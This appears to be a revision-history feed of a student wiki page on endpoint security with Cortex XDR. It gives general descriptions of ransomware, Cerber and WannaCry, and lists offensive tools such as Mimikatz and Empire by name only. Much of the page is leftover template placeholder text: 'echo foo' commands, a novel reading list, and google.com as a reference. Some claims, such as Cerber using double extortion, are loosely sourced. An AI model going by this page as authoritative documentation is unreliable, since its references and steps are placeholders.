Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
==== Cerber Ransomware ====&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
==== WannaCry Ransomware ==== &lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Cortex XDR ====&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
&lt;br /&gt;
* War and Peace&lt;br /&gt;
* Lord of the Rings&lt;br /&gt;
* The Baroque Cycle&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
Windows 10 OS&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[A course where this documentation was used]] (2017, 2018)&lt;br /&gt;
* [[Another one]] (2018)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11253</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11253"/>
		<updated>2023-01-28T20:11:22Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Ransomware */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
==== Cerber Ransomware ====&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
==== WannaCry Ransomware ==== &lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
&lt;br /&gt;
* War and Peace&lt;br /&gt;
* Lord of the Rings&lt;br /&gt;
* The Baroque Cycle&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
Windows 10 OS&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[A course where this documentation was used]] (2017, 2018)&lt;br /&gt;
* [[Another one]] (2018)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11252</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11252"/>
		<updated>2023-01-28T20:10:14Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Ransomware */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
==== Cerber Ransomware ====&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
&lt;br /&gt;
* War and Peace&lt;br /&gt;
* Lord of the Rings&lt;br /&gt;
* The Baroque Cycle&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
Windows 10 OS&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[A course where this documentation was used]] (2017, 2018)&lt;br /&gt;
* [[Another one]] (2018)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11249</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11249"/>
		<updated>2023-01-28T20:08:37Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Step 1 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
&lt;br /&gt;
* War and Peace&lt;br /&gt;
* Lord of the Rings&lt;br /&gt;
* The Baroque Cycle&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
Windows 10 OS&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[A course where this documentation was used]] (2017, 2018)&lt;br /&gt;
* [[Another one]] (2018)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11241</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11241"/>
		<updated>2023-01-28T20:05:33Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Used Software */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Enter these commands in the shell&lt;br /&gt;
&lt;br /&gt;
 echo foo&lt;br /&gt;
 echo bar&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
&lt;br /&gt;
* War and Peace&lt;br /&gt;
* Lord of the Rings&lt;br /&gt;
* The Baroque Cycle&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
Windows 10 OS&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[A course where this documentation was used]] (2017, 2018)&lt;br /&gt;
* [[Another one]] (2018)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11239</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11239"/>
		<updated>2023-01-28T20:04:45Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Used Software */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Enter these commands in the shell&lt;br /&gt;
&lt;br /&gt;
 echo foo&lt;br /&gt;
 echo bar&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
&lt;br /&gt;
* War and Peace&lt;br /&gt;
* Lord of the Rings&lt;br /&gt;
* The Baroque Cycle&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
Windows 10 OS&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
Cortex XDR&lt;br /&gt;
WannaCry Ransomware&lt;br /&gt;
Cerber Ransomware&lt;br /&gt;
Gentilkiwi / Mimikatz &lt;br /&gt;
BC-Security / Empire &lt;br /&gt;
Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[A course where this documentation was used]] (2017, 2018)&lt;br /&gt;
* [[Another one]] (2018)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11238</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11238"/>
		<updated>2023-01-28T20:02:56Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Used Hardware */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Enter these commands in the shell&lt;br /&gt;
&lt;br /&gt;
 echo foo&lt;br /&gt;
 echo bar&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
&lt;br /&gt;
* War and Peace&lt;br /&gt;
* Lord of the Rings&lt;br /&gt;
* The Baroque Cycle&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
Windows 10 OS&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
Cortex XDR&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[A course where this documentation was used]] (2017, 2018)&lt;br /&gt;
* [[Another one]] (2018)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11236</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11236"/>
		<updated>2023-01-28T20:02:07Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Requirements */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
